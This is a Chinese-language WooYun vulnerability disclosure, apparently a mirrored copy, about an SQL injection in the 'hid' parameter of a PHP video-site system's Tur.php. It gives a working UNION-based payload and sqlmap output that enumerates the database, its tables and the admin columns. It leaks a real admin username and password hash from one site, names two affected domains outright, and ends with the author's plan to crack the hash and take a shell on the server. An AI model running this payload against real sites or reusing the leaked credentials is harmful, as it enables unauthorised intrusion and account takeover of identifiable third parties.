乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-11: 细节已通知厂商并且等待厂商处理中 2015-10-16: 厂商已经确认,细节仅向厂商公开 2015-10-19: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航) 2015-12-10: 细节向核心白帽子及相关领域专家公开 2015-12-20: 细节向普通白帽子公开 2015-12-30: 细节向实习白帽子公开 2016-01-14: 细节向公众公开
大部分用此系统的网站都是新疆那边的文字啊……看不懂……
注入点是:
http://域名/Tur.php?hid=
7个案例:
http://**.**.**.**/tur.php?hid=24http://**.**.**.**/Tur.php?hid=1http://www.atax.biz/Tur.php?hid=1http://www.xohxoh.biz/tur.php?hid=6http://**.**.**.**/new/mtv/tur.php?hid=1http://**.**.**.**/tur.php?hid=1http://**.**.**.**/Tur.php?hid=1
以
http://**.**.**.**/tur.php?hid=24
为例:DB_USER:
Payload: hid=-8007 UNION ALL SELECT NULL,CONCAT(0x7178627a71,0x5a675a6c5473525a736e,0x7162626271)-----[22:30:47] [INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 5.3.17back-end DBMS: MySQL 5.0.12[22:30:47] [INFO] fetching current usercurrent user: 'hanjamat@localhost'
DB:
web application technology: Nginx, PHP 5.3.17back-end DBMS: MySQL 5.0.12[22:30:55] [INFO] fetching current databasecurrent database: 'hanjamat'
Tables:
Database: hanjamat[28 tables]+-----------------------+| 007kino_baxlik_harkat || 007kino_baxlik || 007kino_bikat || 007kino_kino || 007kino_tur || 007kinobaxlik_harkat || 007kinobaxlik || 007kinobikat || 007kinokino || 007kinotur || uycom_admingroups || uycom_admins || uycom_categories || uycom_channels || uycom_contents || uycom_guestbook || uycom_jobs || uycom_orders || uycom_users || zuklan_admin || zuklan_adminu || zuklan_bekat || zuklan_book || zuklan_itot || zuklan_itot_tur || zuklan_kino || zuklan_kino_tur || zuklan_kino_url |+-----------------------+
Columns:
Database: hanjamatTable: zuklan_admin[7 columns]+--------------+--------------+| Column | Type |+--------------+--------------+| zuklan_cont | int(8) || zuklan_id | int(10) || zuklan_name | varchar(50) || zuklan_names | varchar(50) || zuklan_pass | varchar(80) || zuklan_pk | tinyint(1) || zuklan_text | varchar(120) |+--------------+--------------+
Data:
Database: hanjamatTable: zuklan_admin[1 entry]+-------------+----------------------------------------------+| zuklan_name | zuklan_pass |+-------------+----------------------------------------------+| yusupjan | ZmM4Y2Q2NDRkMGYyZjExZjczNWU3M2JhZDA0MmYxNGM= |+-------------+----------------------------------------------+
密码:ZmM4Y2Q2NDRkMGYyZjExZjczNWU3M2JhZDA0MmYxNGM= 用Base64解密:fc8cd644d0f2f11f735e73bad042f14c,然后再用MD5解密即可。后台:http://域名//admin/login.php现在密码还没解出来……等解出来了,会去尝试一下getshell,再来提交GETSHELL的洞。
如上
过滤
危害等级:高
漏洞Rank:11
确认时间:2015-10-16 14:23
暂未建立与网站管理单位的直接处置渠道,待认领.
暂无